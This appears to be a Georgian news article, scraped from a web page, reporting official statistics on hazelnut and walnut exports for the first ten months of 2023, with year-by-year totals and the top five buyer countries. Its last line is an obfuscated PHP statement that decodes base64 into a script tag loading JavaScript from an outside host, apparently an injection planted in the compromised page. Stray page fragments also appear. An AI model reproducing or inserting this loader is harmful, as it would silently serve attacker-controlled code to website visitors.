celsiusi
ავერსი საქკაბელი

საქართველოდან თხილის ექსპორტი კლებას აჩვენებს. საქსტატის მონაცემებით 10 თვეში საექსპორტო ბაზრებზე 66.3 მლნ დოლარის თხილის და კაკლის ექსპორტი განხორციელდა, რაც 2020 წლის შემდეგ ყველაზე დაბალი მაჩვენებელია. წლიურად ამ პერიოდში თხილის ექსპორტი 12%-ით შემცირდა.

აღსანიშნავია, რომ თხილის და კაკლის ექსპორტი ბოლო თვეებში გაიზარდა. საქსტატის მონაცემებით, სექტემბერში საექსპორტო ბაზრებზე 12 მლნ დოლარის თხილი გავიდა, ოქტომბერში კი 14 მლნ დოლარი, რაც წლის განმავლობაში ყველზე მაღალი მაჩვენებელია.

თხილის და კაკლის ექსპორტის დინამიკა 10 თვის მონაცემებით წლების მიხედვით ასეთია:

2019 წელი - 45.7 მლნ დოლარი

2020 წელი - 68.17 მლნ დოლარი

2021 წელი - 90.04 მლნ დოლარი

2022 წელი - 75.3 მლნ დოლარი

2023 წელი - 66.3 მლნ დოლარი

ოფიციალური სტატისტიკით, მიმდინარე წლის იანვარ-ოქტომბერში თხილის მთავარი სარეალიზაციო ბაზარი ევროკავშირის ქვეყნები იყო. გარდა ამისა საექსპორტო ქვეყნების ჩამონათვალში გვხვდება სომხეთი, რუსეთი, ყაზახეთი, უკრაინა, საუდის არაბეთი, ბელარუსი, არგენტინა, მაროკო და ა.შ.

2023 წლის 10 თვე თხილის და კაკლის Top-5 საექსპორტო ბაზრის რეიტინგი

1. იტალია - 12.3 მლნ დოლარი

2. გერმანია - 8.5 მლნ დოლარი

3. თურქეთი 6.4 მლნ დოლარი

4. ესპანეთი - 4.9 მლნ დოლარი

5. სომხეთი - 3.7 მლნ დოლარი

262
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");